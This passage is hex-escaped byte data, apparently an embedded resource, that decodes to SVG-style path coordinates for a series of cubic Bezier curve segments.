\x20\x31\x2e\x39\x36\x38\x30\x30\x37\x30\x34\x39\x39\x36\x20\x31\
\x32\x2e\x34\x37\x34\x34\x38\x34\x34\x31\x37\x37\x20\x31\x2e\x39\
\x37\x34\x32\x34\x38\x31\x31\x38\x38\x20\x31\x32\x2e\x34\x33\x32\
\x36\x31\x36\x36\x37\x39\x33\x20\x31\x2e\x39\x38\x30\x34\x38\x39\
\x31\x38\x37\x36\x33\x20\x31\x32\x2e\x33\x39\x30\x36\x38\x37\x34\
\x35\x32\x38\x20\x43\x20\x31\x2e\x39\x38\x36\x37\x33\x30\x32\x35\
\x36\x34\x37\x20\x31\x32\x2e\x33\x34\x38\x37\x35\x38\x32\x32\x36\
\x33\x20\x31\x2e\x39\x39\x32\x39\x37\x31\x33\x32\x35\x33\x31\x20\
\x31\x32\x2e\x33\x30\x36\x37\x36\x37\x31\x34\x35\x20\x31\x2e\x39\
\x39\x39\x32\x31\x32\x33\x39\x34\x31\x34\x20\x31\x32\x2e\x32\x36\
\x34\x37\x34\x36\x39\x33\x33\x20\x43\x20\x32\x2e\x30\x30\x35\x34\
\x35\x33\x34\x36\x32\x39\x38\x20\x31\x32\x2e\x32\x32\x32\x37\x32\
\x36\x37\x32\x31\x20\x32\x2e\x30\x31\x31\x36\x39\x34\x35\x33\x31\
\x38\x31\x20\x31\x32\x2e\x31\x38\x30\x36\x37\x37\x32\x30\x36\x32\
\x20\x32\x2e\x30\x31\x37\x39\x33\x35\x36\x30\x30\x36\x35\x20\x31\
\x32\x2e\x31\x33\x38\x36\x33\x30\x39\x36\x33\x20\x43\x20\x32\x2e\
\x30\x32\x34\x31\x37\x36\x36\x36\x39\x34\x39\x20\x31\x32\x2e\x30\
\x39\x36\x35\x38\x34\x37\x31\x39\x39\x20\x32\x2e\x30\x33\x30\x34\
\x31\x37\x37\x33\x38\x33\x32\x20\x31\x32\x2e\x30\x35\x34\x35\x34\
\x31\x37\x37\x31\x32\x20\x32\x2e\x30\x33\x36\x36\x35\x38\x38\x30\
\x37\x31\x36\x20\x31\x32\x2e\x30\x31\x32\x35\x33\x34\x34\x39\x31\
\x35\x20\x43\x20\x32\x2e\x30\x34\x32\x38\x39\x39\x38\x37\x35\x39\
\x39\x20\x31\x31\x2e\x39\x37\x30\x35\x32\x37\x32\x31\x31\x38\x20\
\x32\x2e\x30\x34\x39\x31\x34\x30\x39\x34\x34\x38\x33\x20\x31\x31\
\x2e\x39\x32\x38\x35\x35\x35\x38\x31\x38\x38\x20\x32\x2e\x30\x35\
\x35\x33\x38\x32\x30\x31\x33\x36\x37\x20\x31\x31\x2e\x38\x38\x36\
\x36\x35\x32\x34\x33\x37\x20\x43\x20\x32\x2e\x30\x36\x31\x36\x32\
\x33\x30\x38\x32\x35\x20\x31\x31\x2e\x38\x34\x34\x37\x34\x39\x30\
\x35\x35\x32\x20\x32\x2e\x30\x36\x37\x38\x36\x34\x31\x35\x31\x33\
\x34\x20\x31\x31\x2e\x38\x30\x32\x39\x31\x34\x30\x39\x36\x39\x20\
\x32\x2e\x30\x37\x34\x31\x30\x35\x32\x32\x30\x31\x38\x20\x31\x31\
\x2e\x37\x36\x31\x31\x37\x39\x33\x38\x36\x37\x20\x43\x20\x32\x2e\
\x30\x38\x30\x33\x34\x36\x32\x38\x39\x30\x31\x20\x31\x31\x2e\x37\
\x31\x39\x34\x34\x34\x36\x37\x36\x36\x20\x32\x2e\x30\x38\x36\x35\
\x38\x37\x33\x35\x37\x38\x35\x20\x31\x31\x2e\x36\x37\x37\x38\x31\
\x30\x38\x32\x30\x38\x20\x32\x2e\x30\x39\x32\x38\x32\x38\x34\x32\
\x36\x36\x38\x20\x31\x31\x2e\x36\x33\x36\x33\x30\x39\x32\x39\x35\
\x34\x20\x43\x20\x32\x2e\x30\x39\x39\x30\x36\x39\x34\x39\x35\x35\
\x32\x20\x31\x31\x2e\x35\x39\x34\x38\x30\x37\x37\x37\x20\x32\x2e\
\x31\x30\x35\x33\x31\x30\x35\x36\x34\x33\x36\x20\x31\x31\x2e\x35\
\x35\x33\x34\x33\x39\x33\x37\x34\x20\x32\x2e\x31\x31\x31\x35\x35\
\x31\x36\x33\x33\x31\x39\x20\x31\x31\x2e\x35\x31\x32\x32\x33\x35\
\x31\x38\x35\x39\x20\x43\x20\x32\x2e\x31\x31\x37\x37\x39\x32\x37\
\x30\x32\x30\x33\x20\x31\x31\x2e\x34\x37\x31\x30\x33\x30\x39\x39\
\x37\x38\x20\x32\x2e\x31\x32\x34\x30\x33\x33\x37\x37\x30\x38\x36\
\x20\x31\x31\x2e\x34\x32\x39\x39\x39\x32\x30\x30\x38\x34\x20\x32\
\x2e\x31\x33\x30\x32\x37\x34\x38\x33\x39\x37\x20\x31\x31\x2e\x33\
\x38\x39\x31\x34\x38\x38\x35\x30\x37\x20\x43\x20\x32\x2e\x31\x33\
\x36\x35\x31\x35\x39\x30\x38\x35\x34\x20\x31\x31\x2e\x33\x34\x38\
\x33\x30\x35\x36\x39\x32\x39\x20\x32\x2e\x31\x34\x32\x37\x35\x36\
\x39\x37\x37\x33\x37\x20\x31\x31\x2e\x33\x30\x37\x36\x35\x39\x35\
\x34\x37\x37\x20\x32\x2e\x31\x34\x38\x39\x39\x38\x30\x34\x36\x32\
\x31\x20\x31\x31\x2e\x32\x36\x37\x32\x34\x30\x35\x35\x35\x32\x20\
\x43\x20\x32\x2e\x31\x35\x35\x32\x33\x39\x31\x31\x35\x30\x34\x20\
\x31\x31\x2e\x32\x32\x36\x38\x32\x31\x35\x36\x32\x36\x20\x32\x2e\
\x31\x36\x31\x34\x38\x30\x31\x38\x33\x38\x38\x20\x31\x31\x2e\x31\
\x38\x36\x36\x33\x31\x30\x39\x32\x20\x32\x2e\x31\x36\x37\x37\x32\
\x31\x32\x35\x32\x37\x32\x20\x31\x31\x2e\x31\x34\x36\x36\x39\x38\
\x37\x34\x33\x39\x20\x43\x20\x32\x2e\x31\x37\x33\x39\x36\x32\x33\
\x32\x31\x35\x35\x20\x31\x31\x2e\x31\x30\x36\x37\x36\x36\x33\x39\
\x35\x38\x20\x32\x2e\x31\x38\x30\x32\x30\x33\x33\x39\x30\x33\x39\
\x20\x31\x31\x2e\x30\x36\x37\x30\x39\x33\x37\x32\x35\x39\x20\x32\
\x2e\x31\x38\x36\x34\x34\x34\x34\x35\x39\x32\x32\x20\x31\x31\x2e\
\x30\x32\x37\x37\x30\x39\x37\x34\x39\x32\x20\x43\x20\x32\x2e\x31\
\x39\x32\x36\x38\x35\x35\x32\x38\x30\x36\x20\x31\x30\x2e\x39\x38\
\x38\x33\x32\x35\x37\x37\x32\x35\x20\x32\x2e\x31\x39\x38\x39\x32\
\x36\x35\x39\x36\x39\x20\x31\x30\x2e\x39\x34\x39\x32\x33\x32\x32\
\x32\x38\x37\x20\x32\x2e\x32\x30\x35\x31\x36\x37\x36\x36\x35\x37\
\x33\x20\x31\x30\x2e\x39\x31\x30\x34\x35\x37\x35\x30\x32\x38\x20\
\x43\x20\x32\x2e\x32\x31\x31\x34\x30\x38\x37\x33\x34\x35\x37\x20\
\x31\x30\x2e\x38\x37\x31\x36\x38\x32\x37\x37\x36\x39\x20\x32\x2e\
\x32\x31\x37\x36\x34\x39\x38\x30\x33\x34\x20\x31\x30\x2e\x38\x33\
\x33\x32\x32\x38\x37\x38\x39\x36\x20\x32\x2e\x32\x32\x33\x38\x39\
\x30\x38\x37\x32\x32\x34\x20\x31\x30\x2e\x37\x39\x35\x31\x32\x33\
\x32\x35\x32\x20\x43\x20\x32\x2e\x32\x33\x30\x31\x33\x31\x39\x34\
\x31\x30\x38\x20\x31\x30\x2e\x37\x35\x37\x30\x31\x37\x37\x31\x34\
\x34\x20\x32\x2e\x32\x33\x36\x33\x37\x33\x30\x30\x39\x39\x31\x20\
\x31\x30\x2e\x37\x31\x39\x32\x36\x32\x37\x32\x35\x34\x20\x32\x2e\
\x32\x34\x32\x36\x31\x34\x30\x37\x38\x37\x35\x20\x31\x30\x2e\x36\
\x38\x31\x38\x38\x35\x32\x37\x39\x33\x20\x43\x20\x32\x2e\x32\x34\
\x38\x38\x35\x35\x31\x34\x37\x35\x38\x20\x31\x30\x2e\x36\x34\x34\
\x35\x30\x37\x38\x33\x33\x31\x20\x32\x2e\x32\x35\x35\x30\x39\x36\
\x32\x31\x36\x34\x32\x20\x31\x30\x2e\x36\x30\x37\x35\x31\x30\x32\
\x30\x33\x37\x20\x32\x2e\x32\x36\x31\x33\x33\x37\x32\x38\x35\x32\
\x36\x20\x31\x30\x2e\x35\x37\x30\x39\x31\x38\x36\x32\x36\x36\x20\
\x43\x20\x32\x2e\x32\x36\x37\x35\x37\x38\x33\x35\x34\x30\x39\x20\
\x31\x30\x2e\x35\x33\x34\x33\x32\x37\x30\x34\x39\x35\x20\x32\x2e\
\x32\x37\x33\x38\x31\x39\x34\x32\x32\x39\x33\x20\x31\x30\x2e\x34\
\x39\x38\x31\x34\x33\x39\x37\x30\x31\x20\x32\x2e\x32\x38\x30\x30\
\x36\x30\x34\x39\x31\x37\x36\x20\x31\x30\x2e\x34\x36\x32\x33\x39\
\x34\x38\x32\x35\x20\x43\x20\x32\x2e\x32\x38\x36\x33\x30\x31\x35\
\x36\x30\x36\x20\x31\x30\x2e\x34\x32\x36\x36\x34\x35\x36\x37\x39\
\x38\x20\x32\x2e\x32\x39\x32\x35\x34\x32\x36\x32\x39\x34\x34\x20\
\x31\x30\x2e\x33\x39\x31\x33\x33\x33\x30\x38\x31\x39\x20\x32\x2e\
\x32\x39\x38\x37\x38\x33\x36\x39\x38\x32\x37\x20\x31\x30\x2e\x33\
\x35\x36\x34\x38\x31\x36\x32\x39\x34\x20\x43\x20\x32\x2e\x33\x30\
\x35\x30\x32\x34\x37\x36\x37\x31\x31\x20\x31\x30\x2e\x33\x32\x31\
\x36\x33\x30\x31\x37\x36\x38\x20\x32\x2e\x33\x31\x31\x32\x36\x35\
\x38\x33\x35\x39\x34\x20\x31\x30\x2e\x32\x38\x37\x32\x34\x32\x36\
\x34\x36\x32\x20\x32\x2e\x33\x31\x37\x35\x30\x36\x39\x30\x34\x37\
\x38\x20\x31\x30\x2e\x32\x35\x33\x33\x34\x32\x37\x35\x39\x32\x20\
\x43\x20\x32\x2e\x33\x32\x33\x37\x34\x37\x39\x37\x33\x36\x32\x20\
\x31\x30\x2e\x32\x31\x39\x34\x34\x32\x38\x37\x32\x33\x20\x32\x2e\
\x33\x32\x39\x39\x38\x39\x30\x34\x32\x34\x35\x20\x31\x30\x2e\x31\
\x38\x36\x30\x33\x33\x35\x36\x34\x39\x20\x32\x2e\x33\x33\x36\x32\
\x33\x30\x31\x31\x31\x32\x39\x20\x31\x30\x2e\x31\x35\x33\x31\x33\
\x37\x36\x34\x35\x35\x20\x43\x20\x32\x2e\x33\x34\x32\x34\x37\x31\
\x31\x38\x30\x31\x33\x20\x31\x30\x2e\x31\x32\x30\x32\x34\x31\x37\
\x32\x36\x32\x20\x32\x2e\x33\x34\x38\x37\x31\x32\x32\x34\x38\x39\
\x36\x20\x31\x30\x2e\x30\x38\x37\x38\x36\x32\x32\x38\x35\x37\x20\
\x32\x2e\x33\x35\x34\x39\x35\x33\x33\x31\x37\x38\x20\x31\x30\x2e\
\x30\x35\x36\x30\x32\x31\x31\x38\x34\x32\x20\x43\x20\x32\x2e\x33\
\x36\x31\x31\x39\x34\x33\x38\x36\x36\x33\x20\x31\x30\x2e\x30\x32\
\x34\x31\x38\x30\x30\x38\x32\x36\x20\x32\x2e\x33\x36\x37\x34\x33\
\x35\x34\x35\x35\x34\x37\x20\x39\x2e\x39\x39\x32\x38\x38\x30\x35\
\x36\x30\x38\x37\x20\x32\x2e\x33\x37\x33\x36\x37\x36\x35\x32\x34\
\x33\x31\x20\x39\x2e\x39\x36\x32\x31\x34\x33\x34\x39\x36\x37\x36\
\x20\x43\x20\x32\x2e\x33\x37\x39\x39\x31\x37\x35\x39\x33\x31\x34\
\x20\x39\x2e\x39\x33\x31\x34\x30\x36\x34\x33\x32\x36\x35\x20\x32\
\x2e\x33\x38\x36\x31\x35\x38\x36\x36\x31\x39\x38\x20\x39\x2e\x39\
\x30\x31\x32\x33\x35\x32\x31\x32\x30\x35\x20\x32\x2e\x33\x39\x32\
\x33\x39\x39\x37\x33\x30\x38\x31\x20\x39\x2e\x38\x37\x31\x36\x34\
\x39\x36\x39\x38\x33\x39\x20\x43\x20\x32\x2e\x33\x39\x38\x36\x34\
\x30\x37\x39\x39\x36\x35\x20\x39\x2e\x38\x34\x32\x30\x36\x34\x31\
\x38\x34\x37\x33\x20\x32\x2e\x34\x30\x34\x38\x38\x31\x38\x36\x38\
\x34\x39\x20\x39\x2e\x38\x31\x33\x30\x36\x37\x39\x30\x33\x36\x34\
\x20\x32\x2e\x34\x31\x31\x31\x32\x32\x39\x33\x37\x33\x32\x20\x39\
\x2e\x37\x38\x34\x36\x37\x39\x36\x37\x33\x33\x39\x20\x43\x20\x32\
\x2e\x34\x31\x37\x33\x36\x34\x30\x30\x36\x31\x36\x20\x39\x2e\x37\
\x35\x36\x32\x39\x31\x34\x34\x33\x31\x34\x20\x32\x2e\x34\x32\x33\
\x36\x30\x35\x30\x37\x34\x39\x39\x20\x39\x2e\x37\x32\x38\x35\x31\
\x34\x39\x32\x33\x36\x39\x20\x32\x2e\x34\x32\x39\x38\x34\x36\x31\
\x34\x33\x38\x33\x20\x39\x2e\x37\x30\x31\x33\x36\x37\x38\x35\x39\
\x30\x37\x20\x43\x20\x32\x2e\x34\x33\x36\x30\x38\x37\x32\x31\x32\
\x36\x37\x20\x39\x2e\x36\x37\x34\x32\x32\x30\x37\x39\x34\x34\x35\
\x20\x32\x2e\x34\x34\x32\x33\x32\x38\x32\x38\x31\x35\x20\x39\x2e\
\x36\x34\x37\x37\x30\x36\x39\x37\x33\x32\x39\x20\x32\x2e\x34\x34\
\x38\x35\x36\x39\x33\x35\x30\x33\x34\x20\x39\x2e\x36\x32\x31\x38\
\x34\x33\x30\x33\x37\x39\x33\x20\x43\x20\x32\x2e\x34\x35\x34\x38\
\x31\x30\x34\x31\x39\x31\x37\x20\x39\x2e\x35\x39\x35\x39\x37\x39\
\x31\x30\x32\x35\x38\x20\x32\x2e\x34\x36\x31\x30\x35\x31\x34\x38\
\x38\x30\x31\x20\x39\x2e\x35\x37\x30\x37\x36\x38\x39\x36\x34\x34\
\x37\x20\x32\x2e\x34\x36\x37\x32\x39\x32\x35\x35\x36\x38\x35\x20\
\x39\x2e\x35\x34\x36\x32\x32\x38\x31\x33\x38\x35\x37\x20\x43\x20\
\x32\x2e\x34\x37\x33\x35\x33\x33\x36\x32\x35\x36\x38\x20\x39\x2e\
\x35\x32\x31\x36\x38\x37\x33\x31\x32\x36\x37\x20\x32\x2e\x34\x37\
\x39\x37\x37\x34\x36\x39\x34\x35\x32\x20\x39\x2e\x34\x39\x37\x38\
\x31\x39\x38\x32\x37\x31\x38\x20\x32\x2e\x34\x38\x36\x30\x31\x35\
\x37\x36\x33\x33\x35\x20\x39\x2e\x34\x37\x34\x36\x34\x30\x30\x34\
\x35\x36\x37\x20\x43\x20\x32\x2e\x34\x39\x32\x32\x35\x36\x38\x33\
\x32\x31\x39\x20\x39\x2e\x34\x35\x31\x34\x36\x30\x32\x36\x34\x31\
\x36\x20\x32\x2e\x34\x39\x38\x34\x39\x37\x39\x30\x31\x30\x33\x20\
\x39\x2e\x34\x32\x38\x39\x37\x32\x33\x32\x35\x33\x38\x20\x32\x2e\
\x35\x30\x34\x37\x33\x38\x39\x36\x39\x38\x36\x20\x39\x2e\x34\x30\
\x37\x31\x38\x39\x34\x31\x39\x33\x32\x20\x43\x20\x32\x2e\x35\x31\
\x30\x39\x38\x30\x30\x33\x38\x37\x20\x39\x2e\x33\x38\x35\x34\x30\
\x36\x35\x31\x33\x32\x36\x20\x32\x2e\x35\x31\x37\x32\x32\x31\x31\
\x30\x37\x35\x33\x20\x39\x2e\x33\x36\x34\x33\x33\x32\x38\x38\x32\
\x38\x31\x20\x32\x2e\x35\x32\x33\x34\x36\x32\x31\x37\x36\x33\x37\
\x20\x39\x2e\x33\x34\x33\x39\x38\x30\x35\x32\x33\x39\x37\x20\x43\
\x20\x32\x2e\x35\x32\x39\x37\x30\x33\x32\x34\x35\x32\x31\x20\x39\
\x2e\x33\x32\x33\x36\x32\x38\x31\x36\x35\x31\x34\x20\x32\x2e\x35\
\x33\x35\x39\x34\x34\x33\x31\x34\x30\x34\x20\x39\x2e\x33\x30\x34\
\x30\x30\x31\x34\x31\x38\x33\x39\x20\x32\x2e\x35\x34\x32\x31\x38\
\x35\x33\x38\x32\x38\x38\x20\x39\x2e\x32\x38\x35\x31\x31\x31\x30\
\x36\x37\x32\x34\x20\x43\x20\x32\x2e\x35\x34\x38\x34\x32\x36\x34\
\x35\x31\x37\x31\x20\x39\x2e\x32\x36\x36\x32\x32\x30\x37\x31\x36\
\x30\x38\x20\x32\x2e\x35\x35\x34\x36\x36\x37\x35\x32\x30\x35\x35\
\x20\x39\x2e\x32\x34\x38\x30\x37\x31\x31\x39\x31\x38\x36\x20\x32\
\x2e\x35\x36\x30\x39\x30\x38\x35\x38\x39\x33\x39\x20\x39\x2e\x32\
\x33\x30\x36\x37\x32\x30\x34\x38\x38\x38\x20\x43\x20\x32\x2e\x35\
\x36\x37\x31\x34\x39\x36\x35\x38\x32\x32\x20\x39\x2e\x32\x31\x33\
\x32\x37\x32\x39\x30\x35\x39\x20\x32\x2e\x35\x37\x33\x33\x39\x30\
\x37\x32\x37\x30\x36\x20\x39\x2e\x31\x39\x36\x36\x32\x38\x36\x35\
\x39\x35\x34\x20\x32\x2e\x35\x37\x39\x36\x33\x31\x37\x39\x35\x38\
\x39\x20\x39\x2e\x31\x38\x30\x37\x34\x37\x36\x32\x30\x31\x34\x20\
\x43\x20\x32\x2e\x35\x38\x35\x38\x37\x32\x38\x36\x34\x37\x33\x20\
\x39\x2e\x31\x36\x34\x38\x36\x36\x35\x38\x30\x37\x35\x20\x32\x2e\
\x35\x39\x32\x31\x31\x33\x39\x33\x33\x35\x37\x20\x39\x2e\x31\x34\
\x39\x37\x35\x33\x33\x34\x30\x37\x34\x20\x32\x2e\x35\x39\x38\x33\
\x35\x35\x30\x30\x32\x34\x20\x39\x2e\x31\x33\x35\x34\x31\x34\x39\
\x35\x33\x36\x36\x20\x43\x20\x32\x2e\x36\x30\x34\x35\x39\x36\x30\
\x37\x31\x32\x34\x20\x39\x2e\x31\x32\x31\x30\x37\x36\x35\x36\x36\
\x35\x39\x20\x32\x2e\x36\x31\x30\x38\x33\x37\x31\x34\x30\x30\x38\
\x20\x39\x2e\x31\x30\x37\x35\x31\x37\x36\x39\x34\x38\x31\x20\x32\
\x2e\x36\x31\x37\x30\x37\x38\x32\x30\x38\x39\x31\x20\x39\x2e\x30\
\x39\x34\x37\x34\x34\x31\x32\x34\x31\x38\x20\x43\x20\x32\x2e\x36\
\x32\x33\x33\x31\x39\x32\x37\x37\x37\x35\x20\x39\x2e\x30\x38\x31\
\x39\x37\x30\x35\x35\x33\x35\x35\x20\x32\x2e\x36\x32\x39\x35\x36\
\x30\x33\x34\x36\x35\x38\x20\x39\x2e\x30\x36\x39\x39\x38\x37\x30\
\x30\x39\x31\x36\x20\x32\x2e\x36\x33\x35\x38\x30\x31\x34\x31\x35\
\x34\x32\x20\x39\x2e\x30\x35\x38\x37\x39\x38\x30\x30\x30\x32\x32\
\x20\x43\x20\x32\x2e\x36\x34\x32\x30\x34\x32\x34\x38\x34\x32\x36\
\x20\x39\x2e\x30\x34\x37\x36\x30\x38\x39\x39\x31\x32\x38\x20\x32\
\x2e\x36\x34\x38\x32\x38\x33\x35\x35\x33\x30\x39\x20\x39\x2e\x30\
\x33\x37\x32\x31\x39\x32\x39\x38\x33\x31\x20\x32\x2e\x36\x35\x34\
\x35\x32\x34\x36\x32\x31\x39\x33\x20\x39\x2e\x30\x32\x37\x36\x33\
\x32\x31\x34\x36\x39\x20\x43\x20\x32\x2e\x36\x36\x30\x37\x36\x35\
\x36\x39\x30\x37\x36\x20\x39\x2e\x30\x31\x38\x30\x34\x34\x39\x39\
\x35\x35\x20\x32\x2e\x36\x36\x37\x30\x30\x36\x37\x35\x39\x36\x20\
\x39\x2e\x30\x30\x39\x32\x36\x35\x32\x31\x34\x32\x33\x20\x32\x2e\
\x36\x37\x33\x32\x34\x37\x38\x32\x38\x34\x34\x20\x39\x2e\x30\x30\
\x31\x32\x39\x34\x37\x34\x30\x30\x37\x20\x43\x20\x32\x2e\x36\x37\
\x39\x34\x38\x38\x38\x39\x37\x32\x37\x20\x38\x2e\x39\x39\x33\x33\
\x32\x34\x32\x36\x35\x39\x32\x20\x32\x2e\x36\x38\x35\x37\x32\x39\
\x39\x36\x36\x31\x31\x20\x38\x2e\x39\x38\x36\x31\x36\x37\x39\x36\
\x38\x30\x33\x20\x32\x2e\x36\x39\x31\x39\x37\x31\x30\x33\x34\x39\
\x34\x20\x38\x2e\x39\x37\x39\x38\x32\x36\x34\x39\x31\x38\x20\x43\
\x20\x32\x2e\x36\x39\x38\x32\x31\x32\x31\x30\x33\x37\x38\x20\x38\
\x2e\x39\x37\x33\x34\x38\x35\x30\x31\x35\x35\x37\x20\x32\x2e\x37\
\x30\x34\x34\x35\x33\x31\x37\x32\x36\x32\x20\x38\x2e\x39\x36\x37\
\x39\x36\x33\x32\x36\x33\x31\x39\x20\x32\x2e\x37\x31\x30\x36\x39\
\x34\x32\x34\x31\x34\x35\x20\x38\x2e\x39\x36\x33\x32\x36\x30\x35\
\x38\x37\x34\x37\x20\x43\x20\x32\x2e\x37\x31\x36\x39\x33\x35\x33\
\x31\x30\x32\x39\x20\x38\x2e\x39\x35\x38\x35\x35\x37\x39\x31\x31\
\x37\x34\x20\x32\x2e\x37\x32\x33\x31\x37\x36\x33\x37\x39\x31\x32\
\x20\x38\x2e\x39\x35\x34\x36\x37\x39\x32\x34\x30\x33\x35\x20\x32\
\x2e\x37\x32\x39\x34\x31\x37\x34\x34\x37\x39\x36\x20\x38\x2e\x39\
\x35\x31\x36\x32\x32\x36\x33\x34\x34\x37\x20\x43\x20\x32\x2e\x37\
\x33\x35\x36\x35\x38\x35\x31\x36\x38\x20\x38\x2e\x39\x34\x38\x35\
\x36\x36\x30\x32\x38\x36\x20\x32\x2e\x37\x34\x31\x38\x39\x39\x35\
\x38\x35\x36\x33\x20\x38\x2e\x39\x34\x36\x33\x33\x36\x34\x33\x33\
\x37\x39\x20\x32\x2e\x37\x34\x38\x31\x34\x30\x36\x35\x34\x34\x37\
\x20\x38\x2e\x39\x34\x34\x39\x33\x30\x36\x32\x32\x36\x34\x20\x43\
\x20\x32\x2e\x37\x35\x34\x33\x38\x31\x37\x32\x33\x33\x20\x38\x2e\
\x39\x34\x33\x35\x32\x34\x38\x31\x31\x34\x38\x20\x32\x2e\x37\x36\
\x30\x36\x32\x32\x37\x39\x32\x31\x34\x20\x38\x2e\x39\x34\x32\x39\
\x34\x37\x37\x33\x39\x37\x34\x20\x32\x2e\x37\x36\x36\x38\x36\x33\
\x38\x36\x30\x39\x38\x20\x38\x2e\x39\x34\x33\x31\x39\x34\x38\x39\
\x36\x33\x39\x20\x43\x20\x32\x2e\x37\x37\x33\x31\x30\x34\x39\x32\
\x39\x38\x31\x20\x38\x2e\x39\x34\x33\x34\x34\x32\x30\x35\x33\x30\
\x35\x20\x32\x2e\x37\x37\x39\x33\x34\x35\x39\x39\x38\x36\x35\x20\
\x38\x2e\x39\x34\x34\x35\x31\x38\x33\x39\x36\x34\x31\x20\x32\x2e\
\x37\x38\x35\x35\x38\x37\x30\x36\x37\x34\x38\x20\x38\x2e\x39\x34\
\x36\x34\x31\x38\x31\x33\x38\x38\x31\x20\x43\x20\x32\x2e\x37\x39\
\x31\x38\x32\x38\x31\x33\x36\x33\x32\x20\x38\x2e\x39\x34\x38\x33\
\x31\x37\x38\x38\x31\x32\x32\x20\x32\x2e\x37\x39\x38\x30\x36\x39\
\x32\x30\x35\x31\x36\x20\x38\x2e\x39\x35\x31\x30\x34\x35\x39\x37\
\x35\x38\x38\x20\x32\x2e\x38\x30\x34\x33\x31\x30\x32\x37\x33\x39\
\x39\x20\x38\x2e\x39\x35\x34\x35\x39\x35\x33\x36\x37\x34\x34\x20\
\x43\x20\x32\x2e\x38\x31\x30\x35\x35\x31\x33\x34\x32\x38\x33\x20\
\x38\x2e\x39\x35\x38\x31\x34\x34\x37\x35\x39\x30\x31\x20\x32\x2e\
\x38\x31\x36\x37\x39\x32\x34\x31\x31\x36\x36\x20\x38\x2e\x39\x36\
\x32\x35\x32\x30\x33\x38\x37\x39\x31\x20\x32\x2e\x38\x32\x33\x30\
\x33\x33\x34\x38\x30\x35\x20\x38\x2e\x39\x36\x37\x37\x31\x33\x39\
\x34\x32\x30\x31\x20\x43\x20\x32\x2e\x38\x32\x39\x32\x37\x34\x35\
\x34\x39\x33\x34\x20\x38\x2e\x39\x37\x32\x39\x30\x37\x34\x39\x36\
\x31\x32\x20\x32\x2e\x38\x33\x35\x35\x31\x35\x36\x31\x38\x31\x37\
\x20\x38\x2e\x39\x37\x38\x39\x32\x33\x38\x39\x35\x34\x36\x20\x32\
\x2e\x38\x34\x31\x37\x35\x36\x36\x38\x37\x30\x31\x20\x38\x2e\x39\
\x38\x35\x37\x35\x33\x35\x38\x33\x39\x37\x20\x43\x20\x32\x2e\x38\
\x34\x37\x39\x39\x37\x37\x35\x35\x38\x34\x20\x38\x2e\x39\x39\x32\
\x35\x38\x33\x32\x37\x32\x34\x38\x20\x32\x2e\x38\x35\x34\x32\x33\
\x38\x38\x32\x34\x36\x38\x20\x39\x2e\x30\x30\x30\x32\x33\x31\x31\
\x34\x32\x31\x38\x20\x32\x2e\x38\x36\x30\x34\x37\x39\x38\x39\x33\
\x35\x32\x20\x39\x2e\x30\x30\x38\x36\x38\x36\x34\x30\x37\x38\x34\
\x20\x43\x20\x32\x2e\x38\x36\x36\x37\x32\x30\x39\x36\x32\x33\x35\
\x20\x39\x2e\x30\x31\x37\x31\x34\x31\x36\x37\x33\x35\x20\x32\x2e\
\x38\x37\x32\x39\x36\x32\x30\x33\x31\x31\x39\x20\x39\x2e\x30\x32\
\x36\x34\x30\x39\x31\x39\x31\x35\x36\x20\x32\x2e\x38\x37\x39\x32\
\x30\x33\x31\x30\x30\x30\x33\x20\x39\x2e\x30\x33\x36\x34\x37\x36\
\x39\x36\x34\x33\x20\x43\x20\x32\x2e\x38\x38\x35\x34\x34\x34\x31\
\x36\x38\x38\x36\x20\x39\x2e\x30\x34\x36\x35\x34\x34\x37\x33\x37\
\x30\x35\x20\x32\x2e\x38\x39\x31\x36\x38\x35\x32\x33\x37\x37\x20\
\x39\x2e\x30\x35\x37\x34\x31\x37\x35\x37\x37\x38\x35\x20\x32\x2e\
\x38\x39\x37\x39\x32\x36\x33\x30\x36\x35\x33\x20\x39\x2e\x30\x36\
\x39\x30\x38\x32\x32\x39\x35\x30\x33\x20\x43\x20\x32\x2e\x39\x30\
\x34\x31\x36\x37\x33\x37\x35\x33\x37\x20\x39\x2e\x30\x38\x30\x37\
\x34\x37\x30\x31\x32\x32\x31\x20\x32\x2e\x39\x31\x30\x34\x30\x38\
\x34\x34\x34\x32\x31\x20\x39\x2e\x30\x39\x33\x32\x30\x38\x33\x36\
\x38\x36\x33\x20\x32\x2e\x39\x31\x36\x36\x34\x39\x35\x31\x33\x30\
\x34\x20\x39\x2e\x31\x30\x36\x34\x35\x31\x39\x39\x39\x30\x35\x20\
\x43\x20\x32\x2e\x39\x32\x32\x38\x39\x30\x35\x38\x31\x38\x38\x20\
\x39\x2e\x31\x31\x39\x36\x39\x35\x36\x32\x39\x34\x38\x20\x32\x2e\
\x39\x32\x39\x31\x33\x31\x36\x35\x30\x37\x31\x20\x39\x2e\x31\x33\
\x33\x37\x32\x36\x32\x33\x38\x38\x38\x20\x32\x2e\x39\x33\x35\x33\
\x37\x32\x37\x31\x39\x35\x35\x20\x39\x2e\x31\x34\x38\x35\x32\x38\
\x33\x31\x30\x36\x39\x20\x43\x20\x32\x2e\x39\x34\x31\x36\x31\x33\
\x37\x38\x38\x33\x39\x20\x39\x2e\x31\x36\x33\x33\x33\x30\x33\x38\
\x32\x35\x20\x32\x2e\x39\x34\x37\x38\x35\x34\x38\x35\x37\x32\x32\
\x20\x39\x2e\x31\x37\x38\x39\x30\x38\x35\x35\x36\x35\x33\x20\x32\
\x2e\x39\x35\x34\x30\x39\x35\x39\x32\x36\x30\x36\x20\x39\x2e\x31\
\x39\x35\x32\x34\x36\x31\x38\x38\x38\x34\x20\x43\x20\x32\x2e\x39\
\x36\x30\x33\x33\x36\x39\x39\x34\x38\x39\x20\x39\x2e\x32\x31\x31\
\x35\x38\x33\x38\x32\x31\x31\x36\x20\x32\x2e\x39\x36\x36\x35\x37\
\x38\x30\x36\x33\x37\x33\x20\x39\x2e\x32\x32\x38\x36\x38\x35\x34\
\x37\x39\x32\x34\x20\x32\x2e\x39\x37\x32\x38\x31\x39\x31\x33\x32\
\x35\x37\x20\x39\x2e\x32\x34\x36\x35\x33\x33\x34\x31\x37\x35\x32\
\x20\x43\x20\x32\x2e\x39\x37\x39\x30\x36\x30\x32\x30\x31\x34\x20\
\x39\x2e\x32\x36\x34\x33\x38\x31\x33\x35\x35\x38\x31\x20\x32\x2e\
\x39\x38\x35\x33\x30\x31\x32\x37\x30\x32\x34\x20\x39\x2e\x32\x38\
\x32\x39\x38\x30\x30\x36\x32\x33\x39\x20\x32\x2e\x39\x39\x31\x35\
\x34\x32\x33\x33\x39\x30\x37\x20\x39\x2e\x33\x30\x32\x33\x31\x30\
